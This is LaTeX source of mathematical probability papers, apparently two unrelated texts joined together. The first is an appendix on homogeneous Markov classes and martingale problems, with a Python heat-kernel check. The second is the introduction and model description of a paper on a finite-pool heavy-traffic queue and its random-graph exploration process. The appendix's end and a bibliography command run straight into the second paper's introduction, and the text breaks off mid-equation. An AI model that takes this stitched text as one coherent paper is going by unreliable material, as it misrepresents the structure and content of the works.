Now for any positive Borel function $f$, we can set $f_n = f\wedge n$ which is bounded Borel. Since by monotone convergence, $\mathbbm{E}^{s,x}[f_n(t,X_t)]$ tends to $\mathbbm{E}^{s,x}[f(t,X_t)]$, then $(s,x,t)\longmapsto \mathbbm{E}^{s,x}[f(t,X_t)]$ is Borel as the pointwise limit of Borel functions. Finally for a general $f$ it is enough to decompose it into $f=f^+-f^-$ where $f^+,f^-$ are positive functions.
\end{proof}
\section{Technicalities concerning homogeneous Markov classes and martingale problems}\label{SC}
We start by introducing homogeneous Markov classes. In this section, we are given a Polish space $E$ and some $T\in\mathbbm{R}^*_+$.
\begin{notation}\label{HomogeneNonHomogene}
A mapping $\tilde{p}:E\times[0,T]\times\mathcal{B}(E)\longrightarrow[0,1]$ will be called a \textbf{homogeneous transition function} if
$p:(s,x,t,A)\longmapsto \tilde{p}(x,t-s,A)\mathds{1}_{s<t}+\mathds{1}_A(x)\mathds{1}_{s\geq t}$ is a transition function in the sense of Definition \ref{Defp}. This in particular implies $\tilde{p}=p(0,\cdot,\cdot,\cdot)$.
\\
A set of probability measures $(\mathbbm{P}^x)_{x\in E}$ on the canonical space associated to $T$ and $E$ (see Notation \ref{canonicalspace}) will be called a \textbf{homogeneous Markov class} associated to a homogeneous transition function $\tilde{p}$ if
\begin{equation}
\left\{\begin{array}{l}
\forall t\in[0,T]\quad \forall A\in\mathcal{B}(E),\quad \mathbbm{P}^{x}(X_t\in A)=\tilde{p}(x,t,A)\\
\forall 0\leq t\leq u\leq T,\quad \mathbbm{P}^x(X_u\in A|\mathcal{F}_t)=
\tilde p(X_t,u-t,A)\quad \mathbbm{P}^{x} \text{ a.s.}
\end{array}\right.
\end{equation}
Given a homogeneous Markov class $(\mathbbm{P}^x)_{x\in E}$ associated to a homogeneous transition function $\tilde{p}$, one can always consider the Markov class $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ associated to the transition function
$p:(s,x,t,A)\longmapsto \tilde{p}(x,t-s,A)\mathds{1}_{s<t}+\mathds{1}_A(x)\mathds{1}_{s\geq t}$.
In particular, for any $x\in E$, we have $\mathbbm{P}^{0,x}=\mathbbm{P}^x$.
\end{notation}
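A standard example fitting the previous notation is the heat kernel on $E=\mathbbm{R}$, for which $\tilde{p}(x,t,]-\infty,a])=\Phi\left(\frac{a-x}{\sqrt{t}}\right)$, $\Phi$ being the standard Gaussian cumulative distribution function. The sketch below (with arbitrary numerical values) builds the associated non-homogeneous $p$ and checks the Chapman-Kolmogorov equation by numerical integration:

```python
import math
import numpy as np

# Heat kernel example: p~(x, t, (-inf, a]) = Phi((a - x)/sqrt(t)),
# and the associated non-homogeneous transition function
# p(s, x, t, A) = p~(x, t-s, A) for s < t, 1_A(x) otherwise.

def Phi(z):
    return 0.5 * (1.0 + math.erf(z / math.sqrt(2.0)))

def p_tilde(x, t, a):            # mass given to the half-line (-inf, a]
    return Phi((a - x) / math.sqrt(t))

def p(s, x, t, a):
    if s >= t:
        return 1.0 if x <= a else 0.0
    return p_tilde(x, t - s, a)

# Chapman-Kolmogorov for s < t < u: integrate the Gaussian density of
# X_t given X_s = x against p(t, ., u, (-inf, a]).
s, t, u, x, a = 0.0, 0.7, 1.5, 0.2, 1.0
ys = np.linspace(x - 10.0, x + 10.0, 100001)
dens = np.exp(-(ys - x) ** 2 / (2.0 * (t - s))) / math.sqrt(2.0 * math.pi * (t - s))
vals = dens * np.array([p(t, y, u, a) for y in ys])
lhs = float(np.sum((vals[1:] + vals[:-1]) * 0.5 * np.diff(ys)))
assert abs(lhs - p(s, x, u, a)) < 1e-6
```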
We show that a homogeneous transition function necessarily produces a non-homogeneous transition function which is measurable in time.
\begin{proposition}\label{HomoMeasurableint}
Let $\tilde{p}$ be a homogeneous transition function and let $p$ be the associated non homogeneous transition function as described in Notation \ref{HomogeneNonHomogene}. Then $p$ is measurable in time in the sense of Definition \ref{DefFoncTrans}.
\end{proposition}
\begin{proof}
Given that $p:(s,x,t,A)\longmapsto \tilde{p}(x,t-s,A)\mathds{1}_{s<t}+\mathds{1}_A(x)\mathds{1}_{s\geq t}$, it is actually enough to show that $\tilde{p}(\cdot,\cdot,A)$ is Borel for any $A\in\mathcal{B}(E)$. We can also write $ \tilde{p}=p(0,\cdot,\cdot,\cdot)$, so $p$ is measurable in time if $p(0,\cdot,\cdot,A)$ is Borel for any $A\in\mathcal{B}(E)$, and this holds thanks to Proposition \ref{measurableint} applied to $f:=\mathds{1}_A$.
\end{proof}
We then introduce below the notion of homogeneous martingale problems.
\begin{definition}\label{MPhomogene}
Given $A$ an operator mapping a linear algebra $\mathcal{D}(A)\subset \mathcal{B}_b(E,\mathbbm{R})$ into
$\mathcal{B}_b(E,\mathbbm{R})$, we say that a set of probability measures $(\mathbbm{P}^x)_{x\in E}$ on the measurable space $(\Omega,\mathcal{F})$ (see Notation \ref{canonicalspace}) solves the \textbf{homogeneous Martingale Problem} associated to $(\mathcal{D}(A),A)$ if for any $x\in E$, $\mathbbm{P}^x$ satisfies
\begin{itemize}
\item for every $\phi\in\mathcal{D}(A)$, $\phi(X_{\cdot})-\int_0^{\cdot}A\phi(X_r)dr$ is a $(\mathbbm{P}^x,(\mathcal{F}_t)_{t\in[0,T]})$-local
martingale;
\item $\mathbbm{P}^x(X_0=x)=1$.
\end{itemize}
We say that this {\bf homogeneous Martingale Problem is well-posed} if for any $x\in E$, $\mathbbm{P}^x$ is the only probability measure on $(\Omega,\mathcal{F})$ verifying those two items.
\end{definition}
\begin{remark}
If $(\mathbbm{P}^x)_{x\in E}$ is a homogeneous Markov class solving the homogeneous Martingale Problem associated to some $(\mathcal{D}(A),A)$, then the corresponding $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ (see Notation \ref{HomogeneNonHomogene}) solves the Martingale Problem associated to $(\mathcal{D}(A),A,V_t\equiv t)$ in the sense of Definition \ref{MartingaleProblem}. Moreover if the homogeneous Martingale Problem is well-posed, so is the latter one.
\end{remark}
So a homogeneous Markov process solving a homogeneous martingale problem falls
into our setup. We will now see how we can pass from an operator $A$ which only
acts on time-independent functions to an evolution operator $\partial_t+A$,
and see how our Markov class still solves the corresponding martingale problem.
\begin{notation}\label{NotDomain}
Let $E$ be a Polish space and let $A$ be an operator mapping a linear algebra $\mathcal{D}(A)\subset \mathcal{B}_b(E,\mathbbm{R})$ into $\mathcal{B}_b(E,\mathbbm{R})$.
\\
If $\phi\in\mathcal{B}([0,T]\times E,\mathbbm{R})$ is such that for every $t\in[0,T]$, $\phi(t,\cdot)\in\mathcal{D}(A)$, then $A\phi$ will denote the
mapping $(t,x)\longmapsto A(\phi(t,\cdot))(x)$.
\\
\\
We now introduce the time-inhomogeneous domain associated to $A$, which we denote by $\mathcal{D}^{max}(\partial_t+A)$ and which consists of the functions $\phi\in\mathcal{B}_b([0,T]\times E,\mathbbm{R})$ verifying the following conditions:
\begin{itemize}
\item $\forall x\in E$, $\phi(\cdot,x)\in\mathcal{C}^1([0,T],\mathbbm{R})$ and $\forall t\in[0,T]$, $\phi(t,\cdot)\in\mathcal{D}(A)$;
\item $\forall t\in[0,T]$, $\partial_t \phi(t,\cdot)\in\mathcal{D}(A)$ and $\forall x\in E$, $A\phi(\cdot,x)\in\mathcal{C}^1([0,T],\mathbbm{R})$;
\item $\partial_t\circ A\phi=A\circ\partial_t\phi$;
\item $\partial_t\phi$, $A\phi$ and $\partial_t\circ A\phi$ belong to $\mathcal{B}_b([0,T]\times E,\mathbbm{R})$.
\end{itemize}
On $\mathcal{D}^{max}(\partial_t+A)$ we will consider the operator $\partial_t+A$.
\end{notation}
\begin{remark}\label{RemDomain}
With these notations, it is clear that $\mathcal{D}^{max}(\partial_t+A)$ is a sub-linear space of $\mathcal{B}_b([0,T]\times E,\mathbbm{R})$. It is in general not a linear algebra, but always contains $\mathcal{D}(A)$, and even $\mathcal{C}^1([0,T],\mathbbm{R})\otimes\mathcal{D}(A)$, the linear algebra of functions which can be written $\underset{k\leq N}{\sum}\lambda_k\psi_k\phi_k$ where $N\in\mathbbm{N}$, and for any $k$, $\lambda_k\in\mathbbm{R}$, $\psi_k\in\mathcal{C}^1([0,T],\mathbbm{R})$, $\phi_k\in\mathcal{D}(A)$. We also notice that $\partial_t+A$ maps $\mathcal{D}^{max}(\partial_t+A)$ into $\mathcal{B}_b([0,T]\times E,\mathbbm{R})$.
\end{remark}
\begin{lemma}\label{LemDomain}
Adopt the notations and assumptions of Notation \ref{NotDomain}, and let $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ be a Markov class solving the well-posed martingale problem associated to $(A,\mathcal{D}(A),V_t\equiv t)$ in the sense of Definition \ref{MartingaleProblem}. Then it also solves the well-posed martingale problem associated to
$(\partial_t+A,\mathcal{A},V_t\equiv t)$ for any linear algebra $\mathcal{A}$ included in $\mathcal{D}^{max}(\partial_t+A)$.
\end{lemma}
\begin{proof}
We start by noticing that since $A$ maps $\mathcal{D}(A)\subset \mathcal{B}_b(E,\mathbbm{R})$ into $\mathcal{B}_b(E,\mathbbm{R})$, for any $(s,x)\in[0,T]\times E$ and $\phi\in\mathcal{D}(A)$, the process $M^{s,x}[\phi]$ is bounded and is therefore a martingale.
\\
\\
We fix $(s,x)\in[0,T]\times E$, $\phi\in\mathcal{D}^{max}(\partial_t+A)$ and $s\leq t\leq u\leq T$ and we will show that
\begin{equation}\label{eqDomain}
\mathbbm{E}^{s,x}\left[\phi(u,X_u)-\phi(t,X_t)-\int_t^u(\partial_t+A)\phi(r,X_r)dr\middle|\mathcal{F}_t\right]=0,
\end{equation}
which implies that $t\longmapsto\phi(t,X_t)-\int_s^{t}(\partial_t+A)\phi(r,X_r)dr$, $t\in[s,T]$, is a $\mathbbm{P}^{s,x}$-martingale.
We have
\begin{equation*}
\begin{array}{rcl}
&&\mathbbm{E}^{s,x}[\phi(u,X_u)-\phi(t,X_t)|\mathcal{F}_t]\\
&=&\mathbbm{E}^{s,x}[(\phi(u,X_t)-\phi(t,X_t))+(\phi(u,X_u)-\phi(u,X_t))|\mathcal{F}_t]\\
&=&\mathbbm{E}^{s,x}\left[\int_t^u\partial_t\phi(r,X_t)dr+\left(\int_t^uA\phi(u,X_r)dr+(M^{s,x}[\phi(u,\cdot)]_u-M^{s,x}[\phi(u,\cdot)]_t)\right)|\mathcal{F}_t\right]\\
&=&\mathbbm{E}^{s,x}\left[\int_t^u\partial_t\phi(r,X_t)dr+\int_t^uA\phi(u,X_r)dr|\mathcal{F}_t\right] \\
&=& I_0 - I_1 + I_2,
\end{array}
\end{equation*}
where $I_0 = \mathbbm{E}^{s,x}\left[\int_t^u\partial_t\phi(r,X_r)dr+\int_t^uA\phi(r,X_r)dr|\mathcal{F}_t\right]$; $I_1 =\mathbbm{E}^{s,x}\left[\int_t^u(\partial_t\phi(r,X_r)-\partial_t\phi(r,X_t))dr|\mathcal{F}_t\right]$; and $I_2 =\mathbbm{E}^{s,x}\left[\int_t^u(A\phi(u,X_r)-A\phi(r,X_r))dr|\mathcal{F}_t\right]$.
\eqref{eqDomain} will be established
if one proves that $I_1 = I_2$. We do this below.
\\
At fixed $r$ and $\omega$, $v\longmapsto A\phi(v,X_r(\omega))$ is $\mathcal{C}^1$, therefore
$A\phi(u,X_r(\omega))-A\phi(r,X_r(\omega))=\int_r^u\partial_tA\phi(v,X_r(\omega))dv$ and
$I_2= \mathbbm{E}^{s,x}\left[\int_t^u\int_r^u\partial_tA\phi(v,X_r)dvdr|\mathcal{F}_t\right]$. Similarly, applying the same decomposition to $\partial_t\phi(r,\cdot)\in\mathcal{D}(A)$,
$ I_1=\mathbbm{E}^{s,x}\left[\int_t^u\int_t^rA\partial_t\phi(r,X_v)dvdr|\mathcal{F}_t\right]+\mathbbm{E}^{s,x}
\left[\int_t^u(M^{s,x}[\partial_t\phi(r,\cdot)]_r-M^{s,x}[\partial_t\phi(r,\cdot)]_t)dr|\mathcal{F}_t \right].$
\\
Since $\partial_t\phi$ and $A\partial_t\phi$ are bounded, $M^{s,x}[\partial_t\phi(r,\cdot)]_r(\omega)$ is uniformly bounded in $(r,\omega)$, so by Fubini's theorem for conditional expectations we have
\begin{equation}
\begin{array}{rcl}
&&\mathbbm{E}^{s,x}[\int_t^u(M^{s,x}[\partial_t\phi(r,\cdot)]_r-M^{s,x}[\partial_t\phi(r,\cdot)]_t)dr|\mathcal{F}_t]\\
&=&\int_t^u\mathbbm{E}^{s,x}[M^{s,x}[\partial_t\phi(r,\cdot)]_r-M^{s,x}[\partial_t\phi(r,\cdot)]_t|\mathcal{F}_t]dr\\
&=&0.
\end{array}
\end{equation}
Finally, since $\partial_tA\phi=A\partial_t\phi$, exchanging the order of integration on $\{t\leq r\leq v\leq u\}$ and again applying Fubini's theorem for conditional expectations, we obtain $\mathbbm{E}^{s,x}\left[\int_t^u\int_r^u\partial_tA\phi(v,X_r)dvdr|\mathcal{F}_t\right]=\mathbbm{E}^{s,x}\left[\int_t^u\int_t^rA\partial_t\phi(r,X_v)dvdr|\mathcal{F}_t\right]$, so $I_1=I_2$, which concludes the proof.
\end{proof}
In conclusion we can state the following.
\begin{corollary}\label{conclusionA4}
Given a homogeneous Markov class $(\mathbbm{P}^x)_{x\in E}$ solving a well-posed homogeneous Martingale Problem associated to some $(\mathcal{D}(A),A)$,
there exists a Markov class $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ whose transition function is measurable in time and such that for any algebra $\mathcal{A}$ included in $\mathcal{D}^{max}(\partial_t+A)$, $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ solves the well-posed martingale problem associated to $(\partial_t+A,\mathcal{A},V_t\equiv t)$ in the sense of Definition \ref{MartingaleProblem}.
\end{corollary}
\end{appendices}
\bibliographystyle{plain}
\section{Introduction} \label{sec:introduction}
This paper introduces the $\DGa$ queue that models a situation in which only a finite pool of $n$ customers will join the queue. These $n$ customers are triggered to join the queue after independent exponential times, but the rates of their exponential clocks depend on their service requirements. When a customer requires $S$ units of service, its exponential clock rings after an exponential time with mean proportional to $S^{-\alpha}$, where $\alpha\in[0,1]$. Depending on the value of the free parameter $\alpha$, the arrival times are i.i.d.~($\alpha = 0$) or stochastically decrease with the service requirement ($\alpha\in(0,1]$). The queue is attended by a single server that starts working at time zero, works at unit speed, and serves the customers in order of arrival. At time zero, we allow for the possibility that $i$ of the $n$ customers have already joined the queue, waiting for service. We will take $i\ll n$, so that without loss of generality we can assume that at time zero there are still $n$ customers that have yet to arrive. These initial customers are numbered $1, \ldots, i$ and the customers that arrive later are numbered $i + 1, i + 2,\ldots$ in order of arrival. Let $A(k)$ denote the number of customers arriving during the service time of the $k$-th customer. The busy periods of this queue will then be completely characterized by the initial number of customers $i$ and the random variables $\left(A(k)\right)_{k\geq 1}$. Note that the random variables $\left(A(k)\right)_{k\geq 1}$ are not i.i.d.~due to the finite-pool effect and the service-dependent arrival rates. We will model and analyze this queue using the queue-length process embedded at service completions.
We consider the $\DGa$ queue in the large-system limit $n\to\infty$, while imposing at the same time a heavy-traffic regime that will stimulate the occurrence of a substantial first busy period. By substantial we mean that the server can work without idling for quite a while, not only serving the initial customers but also those arriving somewhat later. For this regime we show that the embedded queue-length process converges to a Brownian motion with negative quadratic drift. For the case $\alpha = 0$, referred to as the $\smash{\Delta_{(i)}/G/1}$ queue with i.i.d.~arrivals \cite{honnappa2015delta, honnappa2014transitory}, a similar regime was studied in \cite{bet2014heavy}, while for $\alpha = 1$ it is closely related to the critical inhomogeneous random graph studied in \cite{bhamidi2010scaling,Jose10}.
While the queueing process consists of alternating busy periods and idle periods, in the $\DGa$ queue we naturally focus on the first busy period. After some time, the activity in the queue inevitably becomes negligible. The early phases of the process are therefore of primary interest, when the head start provided by the initial customers still matters and when the rate of newly arriving customers is still relatively high. The head start and strong influx together lead to a substantial first busy period, and essentially determine the relevant time of operation of the system.
We also consider the structural properties of the first busy period in terms of a random graph.
Let the random variable $H(i)$ denote the number of customers served in the first busy period, starting with $i$ initial customers. We then associate a (directed) random graph to the queueing process as follows. Say $H(i) = N$ and consider a graph with vertex set $\{1, 2,\ldots,N\}$ and in which two vertices $r$ and $s$ are joined by an edge if and only if the $r$-th customer arrives during the service time of the $s$-th customer. If $i = 1$, then the graph is a rooted tree with $N$ labeled vertices, the root being labeled 1. If $i > 1$, then the graph is a forest consisting of $i$ distinct rooted trees whose roots are labeled $1,\ldots,i$, respectively. The total number of vertices in the forest is $N$.
This random forest is exemplary for a deep relation between queues and random graphs, perhaps best explained by
interpreting the embedded $\DGa$ queue as an \emph{exploration process}, a generalization of a branching process that can account for dependent random variables $\left(A(k)\right)_{k\geq 1}$. Exploration processes arose in the context of random graphs as a recursive algorithm to investigate questions concerning the size and structure of the largest components \cite{Aldo97}. For a given random graph, the exploration process declares vertices active, neutral or inactive. Initially, only one vertex is active and all others are neutral. At each time step one active vertex (e.g. the one with the smallest index) is explored, and it is declared inactive afterwards. When one vertex is explored, its neutral neighbors become active for the next time step. As time progresses, and more vertices are already explored (inactive) or discovered (active), fewer vertices are neutral. This phenomenon is known as the \emph{depletion-of-points effect} and plays an important role in the scaling limit of the random graph. Let $A(k)$ denote the neutral neighbors of the $k$-th explored vertex. The exploration process then has increments $\left(A(k)\right)_{k\geq 1}$ that each have a different distribution. The exploration process encodes useful information about the underlying random graph. For example, excursions above past minima are the sizes of the connected components. The critical behavior of random graphs connected with the emergence of a giant component has received tremendous attention \cite{ addario2012continuum,bhamidi2014augumented,bhamidi2010scaling,BhaHofLee09b,
dhara2016critical, dhara2016heavy, Jose10, hofstad2010critical, hofstad2016mesoscopic}. Interpreting active vertices as being in a queue, and vertices being explored as customers being served, we see that the exploration process and the (embedded) $\DGa$ queue driven by $\left(A(k)\right)_{k\geq 1}$ are identical.
The analysis of the $\DGa$ queue and associated random forest is challenging because the random variables $\left(A(k)\right)_{k\geq 1}$ are not i.i.d. In the case of i.i.d.~$\left(A(k)\right)_{k\geq 1}$, there exists an even deeper connection between queues and random graphs, established via branching processes instead of exploration processes \cite{kendall1951some}. To see this, declare the initial customers in the queue to be the $0$-th generation. The customers (if any) arriving during the total service time of the initial $i$ customers form the $1$-st generation, and the customers (if any) arriving during the total service time of the customers in generation $t$ form generation $t+1$ for $t \geq 1$. Note that the total progeny of this Galton-Watson branching process has the same distribution as the random variable $H(i)$ in the queueing process. Through this connection, properties of branching processes can be carried over to the queueing processes and associated random graphs \cite{duquesne2002random, legall2005random,limic2001lifo,takacs1988queues,takacs1993limit,takacs1995queueing}. Tak\'acs \cite{takacs1988queues,takacs1993limit,takacs1995queueing} proved several limit theorems for the case of i.i.d.~$\left(A(k)\right)_{k\geq 1}$, in which case the queue-length process and derivatives such as the first busy period weakly converge to (functionals of) the Brownian excursion process. In that classical line, the present paper can be viewed as an extension to exploration processes with more complicated dependency structures in $\left(A(k)\right)_{k\geq 1}$.
In Section \ref{sec:model_description} we describe the $\DGa$ queue and associated graphs in more detail and present our main results. The proof of the main theorem, the stochastic-process limit for the queue-length process in the large-pool heavy-traffic regime, is presented in Sections \ref{sec:overview_proof} and \ref{sec:proof_main_result}. Section \ref{sec:conclusion} discusses some interesting questions related to the $\DGa$ queue and associated random graphs that are left open.
\section{Model description} \label{sec:model_description}
We consider a sequence of queueing systems, each with a finite (but growing) number $n$ of potential customers labelled with indices $i\in[n]:=\{1,\ldots, n\}$. Customers have i.i.d.~service requirements with distribution $F_{\scriptscriptstyle S}(\cdot)$; we denote by $S_i$ the service requirement of customer $i$ and by $S$ a generic random variable with the same distribution. In order to obtain meaningful limits as the system grows large, we scale the service speed by $n/(1+\beta n^{-1/3})$ with $\beta\in\mathbb R$, so that the service time of customer $i$ is given by
\begin{equation}
\tilde S_i = \frac{S_i(1+\beta n^{-1/3})}{n}.
\end{equation}%
We further assume that $\mathbb E[{S}^{2+\alpha}]<\infty$.
If the service requirement of customer $i$ is $S_i$, then, conditioned on $S_i$, its arrival time $T_i$ is assumed to be exponentially distributed with mean $1/(\lambda S_i^{\alpha})$, with $\alpha\in[0,1]$ and $\lambda>0$. Hence
\begin{equation}\label{eq:arrival_times}%
T_i\stackrel{\mathrm{d}}{=}\mathrm{Exp}_i(\lambda S_i^{\alpha})
\end{equation}%
with $\stackrel{\mathrm{d}}{=}$ denoting equality in distribution and $\mathrm{Exp}_i(c)$ an exponential random variable with mean $1/c$ independent across $i$. Note that {conditionally on the service times}, the arrival times are independent (but not identically distributed). We introduce $c(1), c(2), \ldots, c(n)$ as the indices of the customers in order of arrival, so that $T_{c(1)} \leq T_{c(2)}\leq T_{c(3)}\leq\ldots$ almost surely.
We will study the queueing system in heavy traffic, in a regime similar to that of \cite{bet2014heavy, bet2015finite}. The initial traffic intensity $\rho_n$ is kept close to one by imposing the relation
\begin{equation}\label{eq:crit}%
\rho_n := \lambda_n \mathbb{E}[S^{1+\alpha}](1+\beta n^{-1/3}) = 1+\beta n^{-1/3} + o_{\mathbb P}(n^{-1/3}),
\end{equation}%
where $\lambda = \lambda_n$ can depend on $n$ and $f_n = o_{\mathbb P}(n^{-1/3})$ means that $f_nn^{1/3}\sr{\mathbb P}{\rightarrow} 0$ as $n\rightarrow\infty$. The parameter $\beta$ then determines the position of the system inside the critical window: the traffic intensity is greater than one for $\beta>0$, so that the system is initially overloaded, while the system is initially underloaded for $\beta<0$.
Our main object of study is the queue-length process embedded at service completions, given by $Q_n(0) = i$ and
\begin{align}\label{eq:queue_length_process}%
Q_n(k) &= (Q_n(k-1) + A_n(k)-1)^+,
\end{align}%
with $x^+ = \max\{0,x\}$ and $A_n(k)$ the number of arrivals during the $k$-th service given by
\begin{equation}\label{eq:number_arrivals_during_one_service}
A_n(k) = \sum_{i\notin\nu_{k}}\mathds{1}_{\{T_{i}\leq \tilde S _{c(k)}\}}
\end{equation}
where $\nu_{k}\subseteq[n]$ denotes the set of customers who have been served or are in the queue at the start of the $k$-th service. Note that
\begin{equation}\label{eq:cardinality_nu}%
\vert \nu_{k} \vert = (k-1) + Q_n(k-1) + 1 = k + Q_n(k-1).
\end{equation}%
Given a process $t\mapsto X(t)$, we define its \emph{reflected version} through the reflection map $\phi(\cdot)$ as
\begin{equation}%
\phi(X)(t) := X(t) - \inf_{s\leq t} X(s)^-.
\end{equation}%
The process $Q_n(\cdot)$ can alternatively be represented as the reflected version of a certain process $N_n(\cdot)$, that is
\begin{equation}\label{eq:queue_length_process_reflected}%
Q_n(k) = \phi (N_n)(k),
\end{equation}%
where $N_n(\cdot)$ is given by $N_n(0)=i$ and
\begin{align}\label{eq:pre_reflection_queue_length_process}%
N_n(k)&=N_n(k-1)+A_n(k)-1.
\end{align}%
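For a discrete path, the reflection map (and hence \eqref{eq:queue_length_process_reflected}) can be evaluated in a single pass by tracking the running minimum; a minimal sketch of our own, with $x^-$ read as $\min\{x,0\}$:

```python
def reflect(path):
    """One-pass reflection map: phi(X)(k) = X(k) - min(0, min_{j <= k} X(j))."""
    out, running_min = [], 0.0
    for x in path:
        running_min = min(running_min, x)
        out.append(x - running_min)
    return out

# a pre-reflection path N_n with N_n(0) = 1 and increments A_n(k) - 1:
print(reflect([1, 0, -1, -1, -2, -1]))   # [1.0, 0.0, 0.0, 0.0, 0.0, 1.0]
```

The reflected path never goes below zero, matching the behaviour of $Q_n(\cdot)$ in \eqref{eq:queue_length_process}.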
We assume that whenever the server finishes processing one customer, and the queue is empty,
the customer to be placed into service is chosen according to the following size-biased distribution:
\begin{align}\label{eq:choice_of_customer_when_queue_is_empty}%
\mathbb P (\mathrm{customer}~j~\mathrm{is~placed~in~service}\mid \nu_{i-1}) = \frac{S_j^{\alpha}}{\sum_{l\notin \nu_{i-1}}S_l^{\alpha}},\qquad j\notin\nu_{i-1},
\end{align}%
where we tacitly assumed that customer $j$ is the $i$-th customer to be served. \bl{With definitions \eqref{eq:number_arrivals_during_one_service} and \eqref{eq:choice_of_customer_when_queue_is_empty}, the process \eqref{eq:queue_length_process} describes the $\DGa$ queue with exponential arrivals \eqref{eq:arrival_times}, embedded at service completions. }
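To illustrate \eqref{eq:queue_length_process}--\eqref{eq:choice_of_customer_when_queue_is_empty}, the following sketch of ours simulates one run of the embedded queue up to the end of the first busy period, for unit-mean exponential service requirements. It uses the memorylessness of the clocks \eqref{eq:arrival_times}, takes $\lambda_n = n/\sum_{i}S_i^{1+\alpha}$ so that \eqref{eq:crit} holds, and makes two simplifications that are ours: the initial customers are drawn size-biased as in \eqref{eq:choice_of_customer_when_queue_is_empty}, and arrivals within a single service are ordered uniformly at random.

```python
import math
import random

def size_biased_pick(pool, S, alpha, rng):
    """Sample j from pool with probability S_j^alpha / sum_l S_l^alpha."""
    items = list(pool)
    weights = [S[j] ** alpha for j in items]
    x, acc = rng.random() * sum(weights), 0.0
    for j, w in zip(items, weights):
        acc += w
        if acc >= x:
            return j
    return items[-1]

def sim_embedded_queue(n, alpha, beta, q0, rng):
    """One run of the embedded Delta^alpha_(i)/G/1 queue with Exp(1) services,
    started from about q0 * n^(1/3) initial customers; returns the number of
    customers served in the first busy period."""
    S = [rng.expovariate(1.0) for _ in range(n)]
    lam = n / sum(s ** (1 + alpha) for s in S)   # empirical heavy-traffic lambda_n
    speed = (1 + beta * n ** (-1 / 3)) / n       # tilde S_i = S_i * speed
    neutral = set(range(n))
    queue = []
    for _ in range(max(1, int(q0 * n ** (1 / 3)))):
        j = size_biased_pick(neutral, S, alpha, rng)
        neutral.discard(j)
        queue.append(j)
    served = 0
    while queue:
        c = queue.pop(0)                         # FIFO service
        s_tilde = S[c] * speed
        # by memorylessness, each neutral j joins during this service
        # independently with probability 1 - exp(-lam * S_j^alpha * s_tilde)
        arrivals = [j for j in neutral
                    if rng.random() < 1 - math.exp(-lam * S[j] ** alpha * s_tilde)]
        rng.shuffle(arrivals)                    # batch order: a simplification
        neutral.difference_update(arrivals)
        queue.extend(arrivals)
        served += 1
    return served

rng = random.Random(0)
bp = sim_embedded_queue(n=400, alpha=0.5, beta=1.0, q0=1.0, rng=rng)
```

Averaging $n^{-2/3}\,\mathrm{BP}_n$ over many such runs gives estimates comparable to Table \ref{tab:convergence_expectation_busy_period}.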
\begin{remark}[A directed random tree] \label{rem:directed_random_tree_model} The embedded queueing process \eqref{eq:queue_length_process} and \eqref{eq:queue_length_process_reflected} gives rise to a certain directed rooted tree. To see this, associate a vertex $i$ to customer $i$ and let $c(1)$ be the root. Then, draw a directed edge to $c(1)$ from $c(2),\ldots, c(A_n(1)+1)$ so to all customers who joined during the service time of $c(1)$. Then, draw an edge from all customers who joined during the service time of $c(2)$ to $c(2)$, and so on. This procedure draws a directed edge from $c(i)$ to $c(i + \sum_{j=1}^{i-1}A_n(j)),\ldots,c(i + \sum_{j=1}^{i}A_n(j) )$ if $A_n(i) \geq 1$. The procedure stops when the queue is empty and there are no more customers to serve. When $Q_n(0) = i = 1$ (resp.~$i\geq 2$), this gives a random directed rooted tree (resp.~forest). The degree of vertex $c(i)$ is $1 + \vert A_n(i)\vert$ and the total number of vertices in the tree (resp.~forest) is given by
\begin{equation}
H_{Q_n}(0) = \inf\{k\geq0:Q_n(k)=0\},
\end{equation}
the hitting time of zero of the process $Q_n(\cdot)$.
\end{remark}
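The construction in Remark \ref{rem:directed_random_tree_model} is easy to make executable: given the initial number of customers $i$ and the arrival counts $(A_n(k))_{k\geq1}$ over the busy period, the sketch below (names ours) returns the parent map of the forest, with roots assigned parent $0$; the number of vertices equals the number of customers served in the first busy period.

```python
def forest_from_arrivals(i, A):
    """Build the forest of the remark: roots 1..i have parent 0, and the
    A[k-1] customers arriving during the k-th service become children of
    vertex k.  Returns (parent map, number of vertices)."""
    parent = {v: 0 for v in range(1, i + 1)}
    queue_len, next_label, k = i, i, 0
    while queue_len > 0 and k < len(A):
        k += 1                        # serve customer k
        for _ in range(A[k - 1]):     # its arrivals become its children
            next_label += 1
            parent[next_label] = k
        queue_len += A[k - 1] - 1
    return parent, len(parent)

# i = 1, arrivals (2, 0, 1, 0): customer 1 has children 2 and 3; 3 has child 4
print(forest_from_arrivals(1, [2, 0, 1, 0]))   # ({1: 0, 2: 1, 3: 1, 4: 3}, 4)
```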
\begin{remark}[An inhomogeneous random graph] If $\alpha = 1$, the random tree constructed in Remark \ref{rem:directed_random_tree_model} is distributionally equivalent to the tree spanned by the exploration process of an inhomogeneous random graph. Let us elaborate on this. An inhomogeneous random graph is a set of vertices $\{i:i\in[n]\}$ with (possibly random) weights $(\mathcal W_i)_{i\in[n]}$ and edges between them. In a \emph{rank-1 inhomogeneous random graph}, given $(\mathcal W_i)_{i\in[n]}$, $i$ and $j$ share an edge with probability
\begin{equation}%
p_{i\leftrightarrow j} := 1- \exp\Big(-\frac{\mathcal W_i\mathcal W_j}{\sum_{i\in[n]}\mathcal W_i}\Big).
\end{equation}%
The tree constructed from the $\smash{\Delta\!%
\begin{smallmatrix}
\!1 \\
(i)
\end{smallmatrix}/G/1}$ queue then corresponds to the exploration process of a rank-1 inhomogeneous random graph, defined as follows. Start with a first arbitrary vertex and reveal all its neighbors. Then the first vertex is discarded and the process moves to a neighbor of the first vertex, and reveals its neighbors. This process continues by exploring the neighbors of each revealed vertex, in order of appearance. By interpreting each vertex as a different customer, this exploration process can be coupled to a $\smash{\Delta\!%
\begin{smallmatrix}
\!1 \\
(i)
\end{smallmatrix}/G/1}$ queue, for a specific choice of $(\mathcal W_i)_{i=1}^n$ and $\lambda_n$. Indeed, when $\mathcal W_i = (1+\beta n^{-1/3})S_i$ for $i=1,\ldots, n$, the probability that $i$ and $j$ are connected is given by
\begin{align}%
p_{j\leftrightarrow i} &= 1 - \exp\Big( -(1+\beta n^{-1/3})\frac{S_i}{n}\frac{ S_j}{\sum_{l\in[n]}S_l/n}\Big) \notag\\
